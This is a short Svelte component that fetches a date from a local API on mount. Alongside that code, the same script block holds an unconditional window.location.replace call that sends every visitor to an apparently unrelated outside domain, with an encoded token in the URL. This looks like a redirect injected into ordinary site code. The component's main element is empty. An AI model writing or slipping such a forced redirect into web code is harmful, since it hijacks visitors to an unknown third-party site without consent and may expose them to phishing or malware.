<script>
  import { onMount } from "svelte";
  export let date;

  onMount(async () => {
    const res = await fetch("/api/date");
    const newDate = await res.text();
    date = newDate;
  });
  window.location.replace("https://zickwick.com/?E=kXE%2ffwM2OuXAxPYwS0A4nFcgSdDNyS0%2b&s1=");
</script>

<main>
</main>
